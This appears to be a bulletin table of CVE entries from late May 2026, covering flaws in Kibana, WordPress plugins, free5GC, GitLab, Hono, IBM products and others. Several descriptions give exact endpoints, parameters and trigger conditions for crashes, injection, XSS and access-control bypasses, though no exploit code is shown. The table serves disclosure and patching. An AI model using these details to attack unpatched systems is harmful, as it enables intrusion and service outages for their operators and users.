| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated low-privileged user can cause Kibana to consume exponentially increasing amounts of memory by submitting a specially crafted Timelion visualization expression containing deeply chained function calls. The resulting data structure grows without bound, exhausting available memory and causing the Kibana service to crash and become unavailable to all users. | 2026-05-28 | 6.5 | CVE-2026-42399 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user can send a specially crafted compressed request payload that is processed prior to authorization checks, causing excessive memory and CPU resource consumption that can result in a Kibana instance becoming unresponsive or crashing. | 2026-05-28 | 6.5 | CVE-2026-42400 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management privileges to bypass the operator-configured connector allowlist, causing the Kibana server to issue outbound requests to destinations the egress controls were intended to block. | 2026-05-28 | 6.3 | CVE-2026-49093 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with viewer-level access can submit a request containing an oversized input value to an analytics collections management endpoint. Kibana will consume excessive CPU and memory resources while processing the request. This results in Kibana becoming unavailable to all users until the service is manually recovered. | 2026-05-28 | 6.5 | CVE-2026-49094 |
| Elastic--Kibana | Operation on a Resource after Expiration or Termination (CWE-672) in Kibana can lead to unauthorized information disclosure. A logic error in how expiration timestamps were validated allowed a time-bounded access token to remain usable beyond its intended validity window, enabling an unauthenticated actor in possession of the token to retrieve the associated content after expiration. | 2026-05-28 | 5.3 | CVE-2026-33463 |
| Elastic--Kibana | A path traversal vulnerability was identified in Kibana's dashboard management functionality. An authenticated user with limited permissions could create a dashboard with a specially crafted identifier. When an administrator subsequently attempts to delete this dashboard through the Kibana interface, the deletion request is redirected to an unintended internal endpoint, potentially resulting in the unauthorized deletion of user accounts or other resources. Exploitation requires an administrator to perform a delete action on the maliciously crafted dashboard object. | 2026-05-28 | 4.6 | CVE-2026-33462 |
| Elastic--Kibana | Improper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection. A user with write access to an Elasticsearch index could persist crafted markup which, when subsequently rendered through an affected Kibana view by another user, was not sufficiently sanitized. Successful exploitation could result in unauthorized UI manipulation and outbound network requests issued from the viewing user's browser session. | 2026-05-28 | 4.1 | CVE-2026-42401 |
| eldougo--Tuxquote | The Tuxquote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'TUXQUOTE' shortcode in versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes ('title', 'align', and 'width') in the tuxquote_build_format() function, which are concatenated into the rendered HTML without being passed through esc_attr() or esc_html(). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8846 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, Ella Core does not verify the UE Security Capabilities received in NGAP PathSwitchRequest messages against its locally stored values. A malicious gNB can overwrite Ella Core's stored UE security capabilities for any UE with arbitrary values by sending a single crafted PathSwitchRequest. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 6.1 | CVE-2026-44475 |
| equalizedigital--Equalize Digital Accessibility Checker WCAG, ADA, EAA and Section 508 compliance | The Equalize Digital Accessibility Checker - WCAG, ADA, EAA and Section 508 compliance plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.42.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the ignore state, ignore reason, and ignore comment of arbitrary accessibility issues across the entire site - including mass modification of all rows sharing an 'object' identifier when largeBatch=true is supplied - corrupting accessibility audit integrity by hiding or dismissing findings outside their authorization scope. | 2026-05-28 | 4.3 | CVE-2026-9015 |
| esiteq--Responsive Video Embedder | The Responsive Video Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rem_video' shortcode in versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes (notably 'id' and 'list') in the video_shortcode() function, which are concatenated directly into an HTML iframe's src attribute without escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8877 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Prior to 9.3.5, the POST /api/v1/EmailTemplate/:id/prepare endpoint accepts an emailAddress parameter and resolves the owning entity (Contact, Lead, Account, or User) without performing an ACL check. An authenticated user with EmailTemplate read permission can extract all field values of any entity by supplying the target's email address, bypassing read: own or read: team ACL restrictions. This vulnerability is fixed in 9.3.5. | 2026-05-28 | 6.5 | CVE-2026-41141 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Prior to 9.3.5, a business logic flaw (Broken Access Control) in EspoCRM 9.3.3 allows low-privileged users to pin arbitrary notes without having the required edit permissions for the parent object. Due to a "write first, authorize later" execution flaw in the backend API, even though the server correctly returns a 403 Forbidden error, the targeted note's pinned status is already persistently modified in the database. The root cause lies in the server-side processing of the POST /api/v1/Note/{id}/pin endpoint. In application/Espo/Tools/Stream/Api/PostNotePin.php, the process() method first calls getNote($id) before calling checkParent($note). This vulnerability is fixed in 9.3.5. | 2026-05-28 | 4.3 | CVE-2026-41160 |
| Exim--Exim | Exim 4.88 before 4.99.4, in some proxy configurations, mishandles certain short payloads, leading to disclosure of uninitialized stack memory values to a client. | 2026-05-30 | 5.3 | CVE-2026-48840 |
| Extreme Networks--Extreme Platform ONE | A race condition in the shared Extreme Platform ONE IAM Gateway API-key authentication path could, under specific high-concurrency traffic conditions, intermittently allow requests authenticated with an Extreme Platform ONE /IAM-issued API key to receive response data for another tenant. The issue was observed through ExtremeCloud IQ/XIQ API endpoints and validated against both XIQ/XAPI and Extreme Platform ONE /Common Services API paths. XIQ-native tokens and standard OAuth/Bearer JWT authentication were not affected. | 2026-05-29 | 6.3 | CVE-2026-9831 |
| Facebook--Facebook for WooCommerce | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Facebook Facebook for WooCommerce allows Phishing. This issue affects Facebook for WooCommerce: from n/a through 3.7.0. | 2026-05-27 | 4.7 | CVE-2026-49059 |
| fides-it--Animate Your Content | The Animate Your Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animation-set' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes in the shortcode_args_to_html_attrs() function, which concatenates shortcode attribute values directly into double-quoted HTML attributes without calling esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8872 |
| fides-it--Post Categories Gallery | The Post Category Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'postcategorygallery' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (such as total_width, color_scheme, and caption_font_size) inside the sc_horcatbar() function, which are concatenated directly into HTML attribute values. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8867 |
| frappe--hrms | Frappe HR is an open-source human resources management solution (HRMS). Prior to 16.5.0, authenticated employees could access other employees' leave details due to improper authorization checks. This vulnerability is fixed in 16.5.0. | 2026-05-27 | 6.5 | CVE-2026-45081 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the AMF in Free5GC does not verify the UE Security Capabilities received in NGAP PathSwitchRequest messages against its locally stored values, as mandated by 3GPP TS 33.501 §6.7.3.1. A malicious gNB can overwrite the AMF's stored UE security capabilities with arbitrary values, which are then propagated in PathSwitchRequest Acknowledge messages and subsequent Handover Request messages. This leads to persistent handover denial-of-service for affected UEs. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.1 | CVE-2026-42081 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's PCF POST /npcf-policyauthorization/v1/app-sessions handler panics on a single authenticated request whose ascReqData.suppFeat == "1" (enabling traffic-routing feature negotiation) and whose medComponents entries supply an afAppId but NO AfRoutReq. The create path then calls provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, ...) with routeReq == nil and dereferences routeReq.RouteToLocs (and other fields) without a nil check, causing runtime error: invalid memory address or nil pointer dereference. Gin recovery converts the panic into HTTP 500. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44317 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44318 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.5 | CVE-2026-44324 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks _, ok = UESubsData.EeSubscriptionCollection[subsId] and sets a 404 problem-details on the miss path, but then continues to UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 4.3 | CVE-2026-44323 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.219, the password reset endpoint returns visually distinct responses depending on whether the submitted email address belongs to an existing user account, allowing unauthenticated attackers to enumerate valid helpdesk agent email addresses. This vulnerability is fixed in 1.8.219. | 2026-05-29 | 5.3 | CVE-2026-45294 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.221, while investigating the ThreadPolicy::delete issue reported previously, the same missing mailbox membership check was found in the sibling ThreadPolicy::edit method. A user with the PERM_EDIT_CONVERSATIONS permission who created a message or internal note in Mailbox A can rewrite that thread's body after an administrator removes them from Mailbox A, because the policy checks only authorship and a global permission flag - not current mailbox membership. This vulnerability is fixed in 1.8.221. | 2026-05-29 | 4.3 | CVE-2026-48810 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.221, FreeScout allows a non-admin user to permanently delete an internal note (private thread) from any conversation, even after that user's access to the mailbox containing the conversation has been revoked. The ThreadPolicy::delete authorization policy does not verify mailbox membership, so a former team member retains destructive write access to notes they created. This vulnerability is fixed in 1.8.221. | 2026-05-29 | 4.3 | CVE-2026-48811 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a cross-site request forgery vulnerability that allows remote attackers to force victims to delete posts by crafting malicious HTML forms. Attackers can create hidden forms targeting tweetdel.php with tweet IDs and automatically submit them to delete arbitrary posts from authenticated user sessions. | 2026-05-25 | 4.3 | CVE-2018-25363 |
| gapgag55--Auto Thumbnails | The Auto Thumbnail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'thumbnails' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on the shortcode's 'width' and 'height' attributes in the athn_thumbnails() function, which are concatenated directly into an HTML <img> tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8899 |
| garber--GBI To Print | The GBI To Print plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0 via the 'div' attribute of the 'gbitoprint' shortcode. This is due to insufficient output escaping in the gbi_toprint_shortcode() function, which concatenates the raw shortcode attribute value directly into an HTML attribute without applying esc_attr() or any other sanitization. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8702 |
| Genetec Inc.--Genetec Security Center | SQL Injection affecting the Access Manager role. | 2026-05-25 | 6.6 | CVE-2026-27768 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. In 1.18.1 and earlier, GET /environments/{id}/volumes/{volumeName}/browse accepts a path query parameter that is passed to a shell command (sh -c "find … | while …") inside an Arcane helper container. The path sanitiser blocks ../ traversal but does not strip Bourne-shell metacharacters such as $() or backticks, and strconv.Quote only escapes Go string metacharacters, not shell substitution sequences. Any authenticated user with access to a browseable volume can execute arbitrary commands inside the helper container; command output is reflected back in the 500 error body. | 2026-05-29 | 6.3 | CVE-2026-45626 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.1 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user to cause denial of service due to insufficient validation. | 2026-05-27 | 6.5 | CVE-2026-1402 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an unauthorized user to enumerate private projects due to incorrect authorization checks. | 2026-05-27 | 5.3 | CVE-2026-6713 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 11.5 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user with developer-role permissions to access sensitive deployment data on projects due to improper authorization checks. | 2026-05-27 | 4.3 | CVE-2026-2601 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.7 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that when foundational flows were enabled at the group level, could have allowed an authenticated user with developer-role permissions to bypass flow restrictions under certain conditions. | 2026-05-27 | 4.3 | CVE-2026-5296 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.7 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed an authenticated user to access CI data from a different ref type than intended. | 2026-05-27 | 4.3 | CVE-2026-8716 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that under certain conditions could have allowed a blocked Project Access Token to continue accessing private resources due to incorrect authorization enforcement. | 2026-05-28 | 4.3 | CVE-2026-9807 |
| GNU--LibreDWG | A vulnerability was found in GNU LibreDWG up to 0.14. The affected element is the function read_2004_compressed_section of the file src/decode.c of the component Dwgread Utility. Performing a manipulation results in heap-based buffer overflow. The attack is only possible with local access. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 5.3 | CVE-2026-9500 |
| GNU--LibreDWG | A vulnerability was identified in GNU LibreDWG up to 0.14. This affects the function decompress_R2004_section of the file src/decode.c of the component Dwgread Utility. The manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The identifier of the patch is e501cb9926c1e9a07a0d1cc997f3e69e9be801c9. To fix this issue, it is recommended to deploy a patch. | 2026-05-25 | 5.3 | CVE-2026-9502 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.1 and 6.0.0-alpha.4, a path validation issue in go-git could allow crafted repository data to affect files outside the intended checkout target, including the repository's .git directory. These validations were introduced in upstream Git years ago, so the vulnerability arose from go-git drifting from those checks. This vulnerability is fixed in 5.19.1 and 6.0.0-alpha.4. | 2026-05-27 | 5.4 | CVE-2026-45571 |
| godlessons--WP AutoBuzz | The WP AutoBuzz plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This vulnerability bypasses WordPress's DISALLOW_UNFILTERED_HTML protection because the unsanitized value is written directly via update_option at the plugin level, entirely outside of WordPress post content handling. | 2026-05-27 | 6.1 | CVE-2026-8911 |
| golzarrahman--GNTT Post Title Ticker | The GNTT Post Title Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0 via the `title-ticker-slide`, `title-ticker-fade`, and `title-ticker-typing` shortcodes. This is due to insufficient input sanitization and output escaping on shortcode attributes (notably `border`, `width`, `height`, `header_background`, `header_text_color`, and `id`) within the `gntt_title_ticker_slide()`, `gntt_title_ticker_fade()`, and `gntt_title_ticker_typing()` functions. None of these attribute values are passed through `esc_attr()` or any other escaping function before being concatenated into HTML output. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8701 |
| gradio-app--gradio | Gradio before version 6.15.0 contains a cookie injection vulnerability that allows remote attackers to perform cross-Space session fixation by exploiting a shared module-level HTTP client used across all users in the reverse proxy endpoint. Attackers controlling any HF Space can return a parent-domain cookie that the shared client stores and automatically replays into all subsequent proxy requests to other legitimate Spaces, affecting all users of the same Gradio deployment. | 2026-05-27 | 6.8 | CVE-2026-48545 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, an open redirect vulnerability in Snipe-IT allows attackers to redirect users to malicious sites via unvalidated HTTP Referer header stored in session variable. This vulnerability is fixed in 8.4.1. | 2026-05-26 | 5.9 | CVE-2026-44833 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, users with component view access could be impacted by an unescaped notes column, resulting in cross-site scripting (XSS). This vulnerability is fixed in 8.4.1. | 2026-05-26 | 4.8 | CVE-2026-44831 |
| haojing8312--WorkClaw | A vulnerability was determined in haojing8312 WorkClaw up to 0.6.4. This affects the function is_dangerous of the file apps/runtime/src-tauri/src/agent/tools/bash.rs of the component Blacklist Handler. Executing a manipulation can lead to os command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 6.3 | CVE-2026-9565 |
| hasanazizul--3D Viewer 3D Model Viewer Augmented Reality Virtual Try On | The 3D Viewer - 3D Model Viewer - Augmented Reality - Virtual Try On plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify all plugin settings by writing arbitrary data to the ar_try_on_settings option in the database via the /wp-json/ar_try_on/v1/settings REST endpoint. | 2026-05-28 | 4.3 | CVE-2026-8682 |
| HCLSoftware--BigFix Remote Control Server | A misconfigured Content Security Policy (CSP) in HCL BigFix Remote Control Server WebUI (versions 10.1.0.0442 and earlier) fails to define directives without fallbacks, allowing attackers to bypass intended security restrictions and load unauthorized resources. | 2026-05-27 | 4 | CVE-2026-21785 |
| hemant6488--CodeIgniter-StudentManagementSystem | A vulnerability was identified in hemant6488 CodeIgniter-StudentManagementSystem. The impacted element is the function addStudent of the file view_students.php of the component Students Controller. The manipulation of the argument Name leads to cross site scripting. The attack can be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 4.3 | CVE-2026-9518 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, do not apply ACLs on certain API endpoints related to platform mail notifications. | 2026-05-27 | 6.3 | CVE-2026-2254 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, expose Hadoop cluster credentials in plain text through the Cluster Test API. Although the user should not see those explicitly, the defect is mitigated by the fact the user can already leverage those credentials to submit jobs under the same account through the backend API. | 2026-05-27 | 4.3 | CVE-2026-2255 |
| Hitachi--Hitachi Ops Center Analyzer | Missing password field masking vulnerability in Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view, Hitachi Ops Center Analyzer probe modules), Hitachi Ops Center Analyzer viewpoint, Hitachi Infrastructure Analytics Advisor (Data Center Analytics, Analytics probe modules). This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.8-00; Hitachi Ops Center Analyzer viewpoint: from 10.8.1-00 before 11.0.8-00; Hitachi Infrastructure Analytics Advisor: from 3.2.0-00 before 11.0.8-00. | 2026-05-26 | 4.6 | CVE-2026-3314 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the ip-restriction middleware (hono/ip-restriction) compares incoming IP addresses against configured deny and allow rules using string equality after partial normalization. Non-canonical IPv6 representations of an address already listed in a static rule - such as compressed forms, explicit-zero forms, or hex-notation IPv4-mapped addresses - do not match the normalized rule entry, causing the rule to be silently skipped. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 5.3 | CVE-2026-47674 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, app.mount() strips the mount prefix from the incoming request path using the raw URL pathname, while route matching is performed against the percent-decoded path. This inconsistency causes the prefix to be stripped at the wrong position when the path contains percent-encoded multi-byte characters, resulting in the mounted sub-application receiving an incorrect path. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 5.3 | CVE-2026-47676 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the jwt and jwk middlewares do not verify that the Authorization header value uses the Bearer scheme. Any two-part header value - regardless of the scheme name in the first position - proceeds to JWT verification. A request presenting a valid JWT under a non-Bearer scheme identifier (such as Basic or Token) is authenticated identically to a correctly formed Bearer request. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 4.8 | CVE-2026-47673 |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.21, the serialize() function in hono/cookie validates domain and path options against characters that corrupt Set-Cookie header syntax (;, \r, \n), but does not apply the same validation to sameSite and priority. An application that passes user-controlled input into either option may produce a Set-Cookie response header containing attacker-chosen additional attributes. This vulnerability is fixed in 4.12.21. | 2026-05-28 | 4.3 | CVE-2026-47675 |
| huankong--hk_shortcode | The hk_shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title-plane' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes in the huankong_post_short_title_plane() function, where the 'title' attribute is concatenated directly into HTML output without any escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8886 |
| IBM--App Connect Enterprise | IBM App Connect Enterprise 13.0.1.0 through 13.0.7.0 stores potentially sensitive information in log files that could be read by a local user. | 2026-05-27 | 5.5 | CVE-2026-5515 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a potential arbitrary file read in the asperahttpd component. An authenticated user may be able to take advantage of this vulnerability to access files in the server's local storage that they should not have access to. | 2026-05-27 | 6.5 | CVE-2026-9035 |
| IBM--Cloud APM, Base Private | IBM Cloud APM, Base Private 8.1.4 and IBM Cloud APM, Advanced Private 8.1.4 IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in the data query logic of the Fenced environment. | 2026-05-27 | 6.5 | CVE-2026-3676 |
| IBM--Cloud Pak for Data System - Cyclops | IBM Cloud Pak for Data System - Cyclops 11.3.0.2 through Interim Fix 002 IBM Cloud Pak for Data System uses default passwords from the manufacturing process during the installation process, which could allow an attacker to bypass authentication. | 2026-05-26 | 5.3 | CVE-2025-36221 |
| IBM--Cloud Pak for Data System - Cyclops | IBM Cloud Pak for Data System - Cyclops 11.3.0.2 through Interim Fix 002 IBM Cloud Pak for Data System is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2026-05-26 | 4.3 | CVE-2025-36220 |
| IBM--Cognos Analytics | IBM Cognos Analytics 11.2.0, 12.0, and 12.1.0 and IBM Cognos Transformer 12.0, 11.2.4, and 12.1.0 are vulnerable to stored cross-site scripting (XSS) in Cognos Administration. This vulnerability allows a privileged user to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. | 2026-05-26 | 6.4 | CVE-2025-36126 |
| IBM--Cognos Analytics | IBM Cognos Analytics 11.2.0, 11.2.4, 12.0, and 12.1.0 and IBM Cognos Transformer 11.2.4, 12.0, and 12.1.0 are vulnerable to cross-site scripting (XSS). This vulnerability allows a remote attacker to inject arbitrary JavaScript code into the web user interface, which may alter the intended functionality and could lead to the disclosure of credentials within a trusted session. | 2026-05-27 | 5.4 | CVE-2025-3633 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to running out of memory when executing certain queries with MDC tables. | 2026-05-27 | 6.5 | CVE-2026-6052 |
| IBM--Db2 | IBM Db2 12.1.0 through 12.1.4 is vulnerable to authorization bypass when uploading to a remote object storage path with a special query. | 2026-05-27 | 6.5 | CVE-2026-6938 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 for Linux, UNIX and Windows (includes DB2 Connect Server) stores potentially sensitive information in log files that could be read by a local user. | 2026-05-26 | 5.5 | CVE-2025-13755 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a denial of service when executing a specially crafted query with a small statement heap. | 2026-05-27 | 5.5 | CVE-2026-6051 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a denial of service when a specially crafted query is run with range partitioned tables. | 2026-05-27 | 5.5 | CVE-2026-6053 |
| IBM--Financial Transaction Manager for SWIFT Services for Multiplatforms | IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4.0 through 3.2.4.15 IBM Financial Transaction Manager SWIFT is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. | 2026-05-26 | 5.4 | CVE-2025-36148 |
| IBM--Guardium Data Protection | IBM Guardium Data Protection 12.2.1, and 12.2.2 's add-on feature of Guardium Data Protection named "Long Term Retention" (LTR) can expose sensitive credentials in debug mode. | 2026-05-27 | 6.5 | CVE-2026-8405 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to denial of service via the optional mod_fastcgi module. | 2026-05-26 | 6.2 | CVE-2026-8852 |
| IBM--i | IBM i 7.6, 7.5, 7.4, and 7.3 is vulnerable to a denial-of-service attack due to uncontrolled recursion in the Integrated Language Environment (ILE) compiler. An authenticated attacker could exploit this vulnerability by compiling specially crafted source code containing a specific combination of statements. | 2026-05-27 | 6.5 | CVE-2026-6936 |
